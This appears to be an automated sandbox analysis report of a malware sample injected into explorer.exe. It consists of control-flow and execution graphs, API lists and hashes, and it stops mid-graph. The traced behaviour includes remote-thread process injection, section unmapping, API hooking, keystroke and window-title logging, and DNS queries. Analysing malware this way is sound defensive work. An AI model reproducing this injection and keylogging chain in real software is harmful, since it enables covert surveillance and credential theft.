46 Function_00D2B00C 47 Function_00D214B2 48 Function_00D21BB0 51->23 51->49 55 Function_00D21D20 51->55 52 Function_00D21822 53->15 53->25 53->41 53->48 53->49 53->50 59 Function_00D21C28 53->59 56 Function_00D23020 56->15 56->30 57 Function_00D245A7 58 Function_00D29FAB 58->11

                                                                        Executed Functions

                                                                        Function 00D2355C Relevance: 1.6, APIs: 1, Instructions: 73nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 119 d2355c-d2356c call d21b70 122 d23572-d235a5 call d21838 119->122 123 d235fc-d23601 119->123 127 d235d1-d235f6 NtUnmapViewOfSection 122->127 128 d235a7 call d21838 122->128 132 d23608-d23617 call d23220 127->132 133 d235f8-d235fa 127->133 130 d235ac-d235c5 128->130 130->127 138 d23621-d2362a 132->138 139 d23619-d2361c call d2355c 132->139 133->123 134 d23602-d23607 call d230f0 133->134 134->132 139->138
                                                                        APIs
                                                                        • NtUnmapViewOfSection.NTDLL ref: 00D235D8
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.4535198953.0000000000D21000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D21000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_d21000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: SectionUnmapView
                                                                        • String ID:
                                                                        • API String ID: 498011366-0
                                                                        • Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                        • Instruction ID: 045512904ea94087d8484ad0e42319be6b9fbbd755f110a12a04d5d091dd2c24
                                                                        • Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                        • Instruction Fuzzy Hash: FF11C430611A195FEB58BBB8A89D27937A0FB35306F58413AA419C76A1DA3D8A41C721
                                                                        Function 00D23220 Relevance: 7.7, APIs: 5, Instructions: 241processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 d23220-d2325b call d21838 3 d23261-d23273 CreateToolhelp32Snapshot 0->3 4 d23549-d23554 SleepEx 3->4 5 d23279-d2328f Process32First 3->5 4->3 6 d23538-d2353a 5->6 7 d23540-d23543 CloseHandle 6->7 8 d23294-d232ac 6->8 7->4 10 d232b2-d232c6 8->10 11 d2348c-d23495 call d21bb0 8->11 10->11 17 d232cc-d232e0 10->17 15 d2352a-d23532 Process32Next 11->15 16 d2349b-d234a4 call d21c08 11->16 15->6 16->15 21 d234aa-d234b1 call d21c28 16->21 17->11 22 d232e6-d232fa 17->22 21->15 27 d234b3-d234c1 call d21b70 21->27 22->11 26 d23300-d23314 22->26 26->11 31 d2331a-d2332e 26->31 27->15 32 d234c3-d23525 call d21938 call d22860 call d21938 27->32 31->11 36 d23334-d23348 31->36 32->15 36->11 41 d2334e-d23362 36->41 41->11 44 d23368-d2337c 41->44 44->11 46 d23382-d23396 44->46 46->11 48 d2339c-d233b0 46->48 48->11 50 d233b6-d233ca 48->50 50->11 52 d233d0-d233e4 50->52 52->11 54 d233ea-d233fe 52->54 54->11 56 d23404-d23418 54->56 56->11 58 d2341a-d2342e 56->58 58->11 60 d23430-d23444 58->60 60->11 62 d23446-d2345a 60->62 62->11 64 d2345c-d23470 62->64 64->11 66 d23472-d23486 64->66 66->11 66->15
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.4535198953.0000000000D21000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D21000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_d21000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 2482764027-0
                                                                        • Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                                        • Instruction ID: 2cc9473a00afce1ca9c2387fe84fcab58a5ea01cd028c46f6f02306f1361e079
                                                                        • Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                                        • Instruction Fuzzy Hash: 518131312186188FE706EF14FC58BEAB7A1FB61744F44866AE446C7160EF7CDA05CBA1
                                                                        Function 00D2A048 Relevance: 4.7, APIs: 3, Instructions: 223memorylibraryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 68 d2a048-d2a04b 69 d2a055-d2a059 68->69 70 d2a065 69->70 71 d2a05b-d2a063 69->71 72 d2a067 70->72 73 d2a04d-d2a053 70->73 71->70 74 d2a06a-d2a071 72->74 73->69 76 d2a073-d2a07b 74->76 77 d2a07d 74->77 76->77 77->74 78 d2a07f-d2a082 77->78 79 d2a097-d2a0a4 78->79 80 d2a084-d2a092 78->80 90 d2a0a6-d2a0a8 79->90 91 d2a0be-d2a0cc call d2a00a 79->91 81 d2a094-d2a095 80->81 82 d2a0ce-d2a0e9 80->82 81->79 84 d2a11a-d2a11d 82->84 85 d2a122-d2a129 84->85 86 d2a11f-d2a120 84->86 89 d2a12f-d2a133 85->89 88 d2a101-d2a105 86->88 92 d2a107-d2a10a 88->92 93 d2a0eb-d2a0ee 88->93 94 d2a190-d2a1e4 VirtualProtect * 2 89->94 95 d2a135-d2a14e LoadLibraryA 89->95 96 d2a0ab-d2a0b2 90->96 91->69 92->85 97 d2a10c-d2a110 92->97 93->85 101 d2a0f0 93->101 98 d2a1e8-d2a1ed 94->98 100 d2a14f-d2a156 95->100 113 d2a0b4-d2a0ba 96->113 114 d2a0bc 96->114 102 d2a112-d2a119 97->102 103 d2a0f1-d2a0f5 97->103 98->98 104 d2a1ef-d2a1fe 98->104 100->89 106 d2a158 100->106 101->103 102->84 103->88 107 d2a0f7-d2a0f9 103->107 110 d2a164-d2a16c 106->110 111 d2a15a-d2a162 106->111 107->88 112 d2a0fb-d2a0ff 107->112 115 d2a16e-d2a17a 110->115 111->115 112->88 112->92 113->114 114->91 114->96 117 d2a185-d2a18f 115->117 118 d2a17c-d2a183 115->118 118->100
                                                                        APIs
                                                                        • LoadLibraryA.KERNELBASE ref: 00D2A147
                                                                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 00D2A1BB
                                                                        • VirtualProtect.KERNELBASE ref: 00D2A1D9
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.4535198953.0000000000D27000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D27000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_d27000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: ProtectVirtual$LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 895956442-0
                                                                        • Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                                        • Instruction ID: 9c3d15c81fda128d01fb23f3e0a0c05022000a30557f1dd11d44358a7c2831b4
                                                                        • Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                                        • Instruction Fuzzy Hash: D3517A31358A3D4BCB25AA3CBDC46B5B7C1E775339F18062AD48AC3289D959D84683A3

                                                                        Execution Graph

                                                                        Execution Coverage:9.6%
                                                                        Dynamic/Decrypted Code Coverage:97.5%
                                                                        Signature Coverage:17.7%
                                                                        Total number of Nodes:322
                                                                        Total number of Limit Nodes:4
                                                                        execution_graph 1019 309162b 1020 309163c 1019->1020 1022 30916aa 1019->1022 1021 309164b GetKeyboardState 1020->1021 1020->1022 1021->1022 1023 309165c ToUnicode 1021->1023 1024 3091684 1023->1024 1024->1022 1026 30916b9 RtlEnterCriticalSection 1024->1026 1027 30917ce RtlLeaveCriticalSection 1026->1027 1028 30916d2 lstrlenW 1026->1028 1027->1022 1029 30916ed lstrlenW 1028->1029 1030 30917bd 1028->1030 1033 3091702 1029->1033 1030->1027 1031 309174e GetForegroundWindow 1031->1030 1032 309175a GetWindowTextW 1031->1032 1035 309177a lstrcmpW 1032->1035 1036 3091771 GetClassNameW 1032->1036 1033->1031 1034 3091723 1033->1034 1034->1030 1045 30917dc 1034->1045 1038 309178b lstrcpyW 1035->1038 1039 30917bf lstrcatW 1035->1039 1036->1035 1042 30917dc 4 API calls 1038->1042 1039->1030 1040 309172f wsprintfW 1041 30917b6 1040->1041 1044 30929eb 3 API calls 1041->1044 1043 3091798 wsprintfW 1042->1043 1043->1041 1044->1030 1048 3092a09 GetProcessHeap RtlAllocateHeap 1045->1048 1047 30917ed GetLocalTime wsprintfW 1047->1040 1048->1047 1049 309182d 1050 3091838 RtlEnterCriticalSection lstrlenW 1049->1050 1051 30918a8 RtlLeaveCriticalSection Sleep 1050->1051 1055 3091854 1050->1055 1051->1050 1054 30929eb VirtualQuery GetProcessHeap HeapFree 1054->1055 1055->1051 1055->1054 1058 30925a4 1055->1058 1064 309200d 1055->1064 1075 30929ae VirtualFree 1055->1075 1076 3092a09 GetProcessHeap RtlAllocateHeap 1055->1076 1059 30925b9 CryptBinaryToStringA 1058->1059 1060 30925e8 1058->1060 1059->1060 1061 30925cc 1059->1061 1060->1055 1077 3092a09 GetProcessHeap RtlAllocateHeap 1061->1077 1063 30925d7 CryptBinaryToStringA 1063->1060 1065 3092030 1064->1065 1066 3092023 lstrlen 1064->1066 1078 3092a09 GetProcessHeap RtlAllocateHeap 1065->1078 1066->1065 1068 3092038 lstrcat 1069 309206d lstrcat 1068->1069 1070 3092074 1068->1070 1069->1070 1079 30920a1 1070->1079 1073 30929eb 3 API calls 1074 3092097 1073->1074 1074->1055 1075->1055 1076->1055 1077->1063 1078->1068 1113 309240f 1079->1113 1083 30920ce 1118 309298a lstrlen MultiByteToWideChar 1083->1118 1085 30920dd 1119 30924cc RtlZeroMemory 1085->1119 1088 309212f RtlZeroMemory 1090 3092164 1088->1090 1089 30929eb 3 API calls 1091 3092084 1089->1091 1094 30923f1 1090->1094 1096 3092192 1090->1096 1121 309243d 1090->1121 1091->1073 1093 30923d7 1093->1094 1095 30929eb 3 API calls 1093->1095 1094->1089 1095->1094 1096->1093 1130 3092a09 GetProcessHeap RtlAllocateHeap 1096->1130 1098 3092262 wsprintfW 1099 3092288 1098->1099 1103 30922f5 1099->1103 1131 3092a09 GetProcessHeap RtlAllocateHeap 1099->1131 1101 30922c2 wsprintfW 1101->1103 1102 30923b4 1104 30929eb 3 API calls 1102->1104 1103->1102 1132 3092a09 GetProcessHeap RtlAllocateHeap 1103->1132 1106 30923c8 1104->1106 1106->1093 1107 30929eb 3 API calls 1106->1107 1107->1093 1108 30923ad 1111 30929eb 3 API calls 1108->1111 1109 3092340 1109->1108 1133 30929bd VirtualAlloc 1109->1133 1111->1102 1112 309239a RtlMoveMemory 1112->1108 1114 3092419 1113->1114 1115 30920c0 1113->1115 1116 3092841 2 API calls 1114->1116 1117 3092a09 GetProcessHeap RtlAllocateHeap 1115->1117 1116->1115 1117->1083 1118->1085 1120 30920ed 1119->1120 1120->1088 1120->1094 1123 309244a 1121->1123 1125 30924ab 1121->1125 1122 309244e DnsQuery_W 1122->1123 1123->1122 1124 309248d DnsFree inet_ntoa 1123->1124 1123->1125 1124->1123 1126 30924ad 1124->1126 1125->1096 1134 3092a09 GetProcessHeap RtlAllocateHeap 1126->1134 1128 30924b7 1135 309298a lstrlen MultiByteToWideChar 1128->1135 1130->1098 1131->1101 1132->1109 1133->1112 1134->1128 1135->1125 1136 3091581 1137 309158e 1136->1137 1138 3091623 1137->1138 1139 30915a7 GlobalLock 1137->1139 1139->1138 1140 30915b5 1139->1140 1141 30915e4 1140->1141 1142 30915c0 1140->1142 1157 309293e 1141->1157 1143 30915c5 lstrlenW 1142->1143 1145 30915f2 1142->1145 1156 3092a09 GetProcessHeap RtlAllocateHeap 1143->1156 1146 3092724 VirtualQuery 1145->1146 1148 30915fb 1146->1148 1150 309161b GlobalUnlock 1148->1150 1151 30915ff lstrlenW 1148->1151 1149 30915d8 lstrcatW 1149->1145 1150->1138 1151->1150 1152 309160a 1151->1152 1153 30916b9 19 API calls 1152->1153 1154 3091614 1153->1154 1155 30929eb 3 API calls 1154->1155 1155->1150 1156->1149 1158 309294d lstrlen 1157->1158 1159 3092982 1157->1159 1164 3092a09 GetProcessHeap RtlAllocateHeap 1158->1164 1159->1145 1161 3092963 MultiByteToWideChar 1161->1159 1162 309297b 1161->1162 1163 30929eb 3 API calls 1162->1163 1163->1159 1164->1161 771 3099ae0 772 3099ca4 771->772 773 3099aeb 771->773 772->772 774 3099bfa LoadLibraryA 773->774 778 3099c3f VirtualProtect VirtualProtect 773->778 775 3099c11 774->775 775->773 777 3099c23 GetProcAddress 775->777 777->775 779 3099c39 777->779 778->772 780 3091000 781 3091010 780->781 782 3091007 780->782 784 3091016 782->784 825 3092724 VirtualQuery 784->825 787 3091098 787->781 789 309102c RtlMoveMemory 790 309104d 789->790 791 3091072 GetCurrentProcessId 789->791 853 3092a09 GetProcessHeap RtlAllocateHeap 790->853 795 309109f 791->795 796 3091093 791->796 794 3091053 RtlMoveMemory 794->791 828 30910a5 795->828 796->787 797 3091096 796->797 854 30913ae RtlZeroMemory VirtualQuery 797->854 799 30910a4 801 3092a09 GetProcessHeap RtlAllocateHeap 799->801 802 30910bf 801->802 803 3092a09 GetProcessHeap RtlAllocateHeap 802->803 804 30910cc wsprintfA 803->804 808 30910f3 804->808 805 309276d OpenFileMappingA MapViewOfFile 805->808 806 309129a Sleep 806->808 807 3092841 lstrlen lstrlen 807->808 808->805 808->806 808->807 809 309275a UnmapViewOfFile CloseHandle 808->809 810 3091148 808->810 809->806 810->808 811 3092a09 GetProcessHeap RtlAllocateHeap 810->811 814 30929eb VirtualQuery GetProcessHeap HeapFree 810->814 816 309127e CloseHandle 810->816 819 3091266 Process32Next 810->819 820 30912ae 16 API calls 810->820 821 30926c9 OpenProcess IsWow64Process IsWow64Process CloseHandle 810->821 822 3092724 VirtualQuery 810->822 823 3091208 lstrcmpiA 810->823 824 30918bf 30 API calls 810->824 812 3091150 RtlMoveMemory CreateToolhelp32Snapshot 811->812 812->810 813 3091171 Process32First 812->813 815 309118d 813->815 813->816 814->810 817 3091190 CharLowerA 815->817 816->810 818 30911ab lstrcmpiA 817->818 817->819 818->810 818->819 819->810 819->817 820->810 821->810 822->810 823->810 824->810 826 309101e 825->826 826->787 827 3092a09 GetProcessHeap RtlAllocateHeap 826->827 827->789 883 3092a09 GetProcessHeap RtlAllocateHeap 828->883 830 30910bf 884 3092a09 GetProcessHeap RtlAllocateHeap 830->884 832 30910cc wsprintfA 836 30910f3 832->836 834 309129a Sleep 834->836 835 3092841 lstrlen lstrlen 835->836 836->834 836->835 847 3091148 836->847 885 309276d OpenFileMappingA 836->885 950 309275a UnmapViewOfFile CloseHandle 836->950 839 3091150 RtlMoveMemory CreateToolhelp32Snapshot 840 3091171 Process32First 839->840 839->847 842 309118d 840->842 843 309127e CloseHandle 840->843 844 3091190 CharLowerA 842->844 843->847 845 30911ab lstrcmpiA 844->845 846 3091266 Process32Next 844->846 845->846 845->847 846->844 846->847 847->836 847->843 847->846 850 3092724 VirtualQuery 847->850 851 3091208 lstrcmpiA 847->851 888 3092a09 GetProcessHeap RtlAllocateHeap 847->888 889 30912ae 847->889 908 30926c9 OpenProcess 847->908 914 30918bf 847->914 945 30929eb 847->945 850->847 851->847 853->794 855 30913e4 854->855 975 3092a09 GetProcessHeap RtlAllocateHeap 855->975 857 3091402 GetModuleFileNameA 976 3092a09 GetProcessHeap RtlAllocateHeap 857->976 859 3091418 GetCurrentProcessId wsprintfA 977 3092799 CryptAcquireContextA 859->977 862 309151b 864 30929eb 3 API calls 862->864 863 309145f RtlInitializeCriticalSection 982 3092a09 GetProcessHeap RtlAllocateHeap 863->982 866 3091522 864->866 868 30929eb 3 API calls 866->868 867 309147f Sleep 983 30925f1 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 867->983 871 3091529 RtlExitUserThread 868->871 870 3091496 GetModuleHandleA GetProcAddress 873 30914b5 870->873 874 30914c6 GetModuleHandleA GetProcAddress 870->874 872 3091533 871->872 872->795 991 3091f3a 873->991 876 30914d9 874->876 877 30914ea GetModuleHandleA 874->877 878 3091f3a 3 API calls 876->878 1001 3091e89 877->1001 878->877 881 30925f1 10 API calls 882 3091501 CreateThread CloseHandle 881->882 882->862 883->830 884->832 886 3092781 MapViewOfFile 885->886 887 3092794 885->887 886->887 887->836 888->839 890 30913a4 889->890 891 30912c5 889->891 890->847 891->890 951 30929bd VirtualAlloc 891->951 893 30912d9 lstrlen 952 3092a09 GetProcessHeap RtlAllocateHeap 893->952 895 30912f0 896 3091351 895->896 953 3092841 lstrlen lstrlen 895->953 897 30929eb 3 API calls 896->897 906 3091375 897->906 900 3091399 959 30929ae VirtualFree 900->959 901 3091329 RtlMoveMemory 955 3092569 901->955 902 3091353 RtlMoveMemory 905 3092569 2 API calls 902->905 905->896 906->900 907 3091388 PathMatchSpecA 906->907 907->900 907->906 909 309271c 908->909 910 30926e7 IsWow64Process 908->910 909->847 911 30926f8 IsWow64Process 910->911 912 309270a 910->912 911->912 913 3092715 CloseHandle 911->913 912->913 913->909 915 3092724 VirtualQuery 914->915 916 30918d9 915->916 917 30918eb OpenProcess 916->917 918 3091b1c 916->918 917->918 919 3091904 917->919 918->847 920 3092724 VirtualQuery 919->920 921 309190b 920->921 921->918 922 3091919 NtSetInformationProcess 921->922 923 3091935 921->923 922->923 960 3091b26 923->960 926 3091b26 2 API calls 927 309197c 926->927 928 3091b19 CloseHandle 927->928 929 3091b26 2 API calls 927->929 928->918 930 30919a6 929->930 966 3091bbd 930->966 933 3091b26 2 API calls 934 30919d6 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 933->934 935 3091af4 CreateRemoteThread 934->935 939 3091a2b 934->939 936 3091b0b CloseHandle 935->936 938 3091b0d CloseHandle CloseHandle 936->938 937 3091a31 CreateMutexA GetLastError 937->939 940 3091a4d CloseHandle Sleep 937->940 938->928 939->937 941 3091a61 GetModuleHandleA GetProcAddress ReadProcessMemory 939->941 940->937 942 3091aed 941->942 943 3091a92 WriteProcessMemory 941->943 942->936 942->938 943->942 944 3091abc CreateRemoteThread CloseHandle Sleep WriteProcessMemory 943->944 944->942 946 3092724 VirtualQuery 945->946 947 30929f3 946->947 948 3092a07 947->948 949 30929f7 GetProcessHeap HeapFree 947->949 948->847 949->948 950->834 951->893 952->895 954 309130c RtlZeroMemory 953->954 954->901 954->902 956 30925a1 955->956 957 3092577 lstrlen RtlMoveMemory 955->957 956->895 957->956 959->890 961 3091b3a 960->961 964 309195a 960->964 962 3091b4a NtCreateSection 961->962 963 3091b69 961->963 962->963 963->964 965 3091b7e NtMapViewOfSection 963->965 964->926 965->964 967 3091bd4 966->967 973 3091c06 966->973 968 3091bd6 RtlMoveMemory 967->968 968->968 968->973 969 3091c69 970 30919b6 NtUnmapViewOfSection 969->970 971 3091c87 LdrProcessRelocationBlock 969->971 970->933 971->969 971->970 972 3091c17 LoadLibraryA 972->970 972->973 973->969 973->972 974 3091c47 GetProcAddress 973->974 974->970 974->973 975->857 976->859 978 3091445 CreateMutexA GetLastError 977->978 979 30927bf CryptCreateHash lstrlen CryptHashData CryptGetHashParam 977->979 978->862 978->863 980 3092805 wsprintfA 979->980 980->980 981 3092827 CryptDestroyHash CryptReleaseContext 980->981 981->978 982->867 984 3092631 983->984 985 3092681 CloseHandle 984->985 986 3092671 Thread32Next 984->986 987 309263d OpenThread 984->987 985->870 986->984 988 3092658 SuspendThread 987->988 989 3092660 ResumeThread 987->989 990 3092666 CloseHandle 988->990 989->990 990->986 992 3091fad 991->992 993 3091f44 991->993 992->874 993->992 1010 3091fea VirtualProtect 993->1010 995 3091f5b 995->992 1011 30929bd VirtualAlloc 995->1011 997 3091f67 998 3091f71 RtlMoveMemory 997->998 999 3091f84 997->999 998->999 1012 3091fea VirtualProtect 999->1012 1002 3092724 VirtualQuery 1001->1002 1003 3091e93 1002->1003 1004 30914fa 1003->1004 1013 3091ed8 1003->1013 1004->881 1008 3091eba 1008->1004 1018 3091fea VirtualProtect 1008->1018 1010->995 1011->997 1012->992 1014 3091eea 1013->1014 1016 3091e9e 1013->1016 1015 3091f04 lstrcmp 1014->1015 1014->1016 1015->1014 1015->1016 1016->1004 1017 3091fea VirtualProtect 1016->1017 1017->1008 1018->1004

                                                                        Callgraph

                                                                        • Executed
                                                                        • Not Executed
                                                                        • Opacity -> Relevance
                                                                        • Disassembly available
                                                                        callgraph 0 Function_03091E89 19 Function_03092724 0->19 37 Function_03091ED8 0->37 44 Function_03091FEA 0->44 1 Function_03092A09 2 Function_0309298A 3 Function_0309200D 3->1 17 Function_030920A1 3->17 43 Function_030929EB 3->43 4 Function_0309288D 5 Function_0309268F 6 Function_0309240F 36 Function_03092841 6->36 7 Function_03091581 7->1 7->19 24 Function_030916B9 7->24 31 Function_0309293E 7->31 7->43 8 Function_03091000 10 Function_03091016 8->10 9 Function_03092799 10->1 10->4 10->5 14 Function_030912AE 10->14 15 Function_030926AE 10->15 16 Function_030913AE 10->16 18 Function_030910A5 10->18 10->19 29 Function_030918BF 10->29 34 Function_030926C9 10->34 10->36 38 Function_0309275A 10->38 10->43 45 Function_0309276D 10->45 11 Function_0309162B 11->24 12 Function_0309182D 12->1 12->3 13 Function_030929AE 12->13 20 Function_030925A4 12->20 12->43 14->1 14->13 26 Function_030929BD 14->26 14->36 39 Function_0309255C 14->39 41 Function_03092569 14->41 14->43 16->0 16->1 16->9 25 Function_03091F3A 16->25 16->43 48 Function_030925F1 16->48 17->1 17->2 17->4 17->6 17->26 28 Function_0309243D 17->28 35 Function_030924CC 17->35 17->43 18->1 18->4 18->5 18->14 18->15 18->19 18->29 18->34 18->36 18->38 18->43 18->45 20->1 21 Function_03093627 22 Function_03091E26 30 Function_03091CBF 22->30 23 Function_03091B26 40 Function_030917DC 24->40 24->43 25->26 33 Function_03091FB4 25->33 25->44 47 Function_03091E66 25->47 27 Function_03091BBD 28->1 28->2 29->19 29->23 29->27 31->1 31->43 32 Function_03091533 33->22 40->1 42 Function_030929E9 43->19 46 Function_03099AE0 47->30

                                                                        Executed Functions

                                                                        Function 03091016 Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 193stringsleepprocessCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 03092724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,030929F3,-00000001,0309128C), ref: 03092731
                                                                          • Part of subcall function 03092A09: GetProcessHeap.KERNEL32(00000008,0000A000,030910BF), ref: 03092A0C
                                                                          • Part of subcall function 03092A09: RtlAllocateHeap.NTDLL(00000000), ref: 03092A13
                                                                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 03091038
                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0309106C
                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 03091075
                                                                        • GetCurrentProcessId.KERNEL32(?,03091010), ref: 0309107B
                                                                        • wsprintfA.USER32 ref: 030910E7
                                                                        • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 03091155
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03091160
                                                                        • Process32First.KERNEL32(00000000,?), ref: 0309117F
                                                                        • CharLowerA.USER32(?), ref: 03091199
                                                                        • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 030911B5
                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 03091212
                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0309126C
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0309127F
                                                                        • Sleep.KERNELBASE(000003E8), ref: 0309129F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
                                                                        • String ID: %s%s$0-vP,v$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                                        • API String ID: 3206029838-1059640896
                                                                        • Opcode ID: 6e62beb66ed9ae49302e770778a82a69859045ccb7f7cc4ae0e0d54b19c63d18
                                                                        • Instruction ID: 33285956bf5f76bc2f995777cb3994a7330d0292c1fe73c9df5af8e0ad94c0df
                                                                        • Opcode Fuzzy Hash: 6e62beb66ed9ae49302e770778a82a69859045ccb7f7cc4ae0e0d54b19c63d18
                                                                        • Instruction Fuzzy Hash: 69513638207306ABEF18FF71DC4897B77EDFBC5340F05096BA9518B290DB388905AA61
                                                                        Function 030910A5 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 151stringsleepprocessCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 03092A09: GetProcessHeap.KERNEL32(00000008,0000A000,030910BF), ref: 03092A0C
                                                                          • Part of subcall function 03092A09: RtlAllocateHeap.NTDLL(00000000), ref: 03092A13
                                                                        • wsprintfA.USER32 ref: 030910E7
                                                                          • Part of subcall function 0309276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 03092777
                                                                          • Part of subcall function 0309276D: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,030910FE), ref: 03092789
                                                                        • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 03091155
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03091160
                                                                        • Process32First.KERNEL32(00000000,?), ref: 0309117F
                                                                        • CharLowerA.USER32(?), ref: 03091199
                                                                        • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 030911B5
                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 03091212
                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0309126C
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0309127F
                                                                        • Sleep.KERNELBASE(000003E8), ref: 0309129F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                                                        • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                                        • API String ID: 3018447944-2805246637
                                                                        • Opcode ID: 7995ec3c80d50397070a2dded2f5bf58388c610c4aed99a513929ae8cb489e24
                                                                        • Instruction ID: 9bf40a53e9bf136f698dc5020b5cd171f4840a84c6106fd6baedd38904761b04
                                                                        • Opcode Fuzzy Hash: 7995ec3c80d50397070a2dded2f5bf58388c610c4aed99a513929ae8cb489e24
                                                                        • Instruction Fuzzy Hash: 2A41E8383073066BEE14FF65CC8497FB3EDFBC5740F040A6BA9919B290EB349905AA51
                                                                        Function 03099AE0 Relevance: 6.2, APIs: 4, Instructions: 194COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 123 3099ae0-3099ae5 124 3099aeb-3099af8 123->124 125 3099cad 123->125 126 3099b0a-3099b0f 124->126 125->125 127 3099b11 126->127 128 3099b00-3099b05 127->128 129 3099b13 127->129 130 3099b06-3099b08 128->130 131 3099b18-3099b1a 129->131 130->126 130->127 132 3099b1c-3099b21 131->132 133 3099b23-3099b27 131->133 132->133 133->131 134 3099b29 133->134 135 3099b2b-3099b32 134->135 136 3099b34-3099b39 134->136 135->131 135->136 137 3099b48-3099b4a 136->137 138 3099b3b-3099b44 136->138 141 3099b4c-3099b51 137->141 142 3099b53-3099b57 137->142 139 3099bba-3099bbd 138->139 140 3099b46 138->140 145 3099bc2-3099bc5 139->145 140->137 141->142 143 3099b59-3099b5e 142->143 144 3099b60-3099b62 142->144 143->144 147 3099b84-3099b93 144->147 148 3099b64 144->148 146 3099bc7-3099bc9 145->146 146->145 149 3099bcb-3099bce 146->149 151 3099b95-3099b9c 147->151 152 3099ba4-3099bb1 147->152 150 3099b65-3099b67 148->150 149->145 153 3099bd0-3099bec 149->153 154 3099b69-3099b6e 150->154 155 3099b70-3099b74 150->155 151->151 156 3099b9e 151->156 152->152 157 3099bb3-3099bb5 152->157 153->146 158 3099bee 153->158 154->155 155->150 159 3099b76 155->159 156->130 157->130 160 3099bf4-3099bf8 158->160 161 3099b78-3099b7f 159->161 162 3099b81 159->162 163 3099bfa-3099c10 LoadLibraryA 160->163 164 3099c3f-3099c42 160->164 161->150 161->162 162->147 165 3099c11-3099c16 163->165 166 3099c45-3099c4c 164->166 165->160 167 3099c18-3099c1a 165->167 168 3099c4e-3099c50 166->168 169 3099c70-3099ca0 VirtualProtect * 2 166->169 171 3099c1c-3099c22 167->171 172 3099c23-3099c30 GetProcAddress 167->172 173 3099c63-3099c6e 168->173 174 3099c52-3099c61 168->174 170 3099ca4-3099ca8 169->170 170->170 175 